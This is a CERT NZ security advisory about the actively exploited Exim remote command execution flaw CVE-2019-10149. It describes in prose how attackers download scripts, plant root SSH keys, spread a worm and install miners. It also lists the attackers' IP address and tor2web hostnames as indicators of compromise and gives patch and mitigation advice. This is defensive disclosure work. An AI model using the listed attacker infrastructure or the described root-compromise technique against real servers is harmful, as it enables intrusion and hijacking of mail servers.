4:25pm, 17 June 2019
TLP Rating:
Exim mail transfer agent (MTA) vulnerability being exploited
CERT NZ is aware of a vulnerability in Exim Mail Transfer Agent (MTA) software being actively exploited by two separate groups. Exim is widely used, according to ZDNet it is thought to be running on over 50% of the mail servers on the internet.
The vulnerability, CVE-2019-10149 and nicknamed "Return of the WIZard", allows attackers to run arbitrary system commands under the Exim process' access level, which on most servers is root.
The two known exploits have been observed spreading malware, establishing backdoor access, and installing cryptocurrency miners on compromised Exim servers.
What's happening
Systems affected
The vulnerability affects versions 4.87 to 4.91 of Exim. It is being exploited by at least two separate groups.
What this means
Security researchers have identified two different hacker groups exploiting this vulnerability. The attacks are similar in nature. They are downloading scripts from the attacker’s servers, which are being run on the target system. The scripts and locations have been observed to change over time, which indicates the groups are still developing their attacks.
One of the groups has used the vulnerability to download a shell script to mail servers that adds an SSH key to the root account. This campaign also features code for a self-spreading worm component that can spread this Exim exploit to other vulnerable Exim servers. The attackers also downloaded and installed a cryptocurrency miner on compromised servers.
What to look for
How to tell if you're at risk
If you’re running versions 4.87 to 4.91 (inclusive) of the Exim mail transfer agent (MTA) software, then you are affected by this vulnerability.
How to tell if you're affected
At the time of this advisory, CERT NZ are aware of the following indicators of compromise:
- Look for any unfamiliar cronjobs in your crontab and remove them if they are not part of expected system operation
- Check your firewall and access logs for the following hostnames or IP addresses:
- 173.212.214.137
- https://an7kmd2wp4xo7hpr.tor2web.su
- https://an7kmd2wp4xo7hpr.tor2web.io
- https://an7kmd2wp4xo7hpr.onion.sh
Cybereason blog including additional indicators of compromise External Link
What to do
Prevention
Make sure you are using the most recent version of Exim, 4.92.
Note that some Linux distributions have backported the fix to older versions, you will need to check your servers to ensure they have the necessary update applied.
Mitigation
Operating system controls such as SELinux or Apparmor could be used to mitigate the impact of an attack. When correctly implemented, these controls limit the resources that the Exim process has access to.
More information
ZDNet article about Return of the WIZard vulnerability and its exploits External Link
Microsoft TechNet blog about Exim implications for Azure External Link
If you require more information or further support, submit a report on our website or contact us on 0800 CERT NZ (0800 2378 69).
For media enquiries, email our media desk at certmedia@cert.govt.nz or call on 021 854 384
How helpful was this page?
This site is protected by reCAPTCHA and the Google Privacy Policy External Link and Terms of Service External Link apply.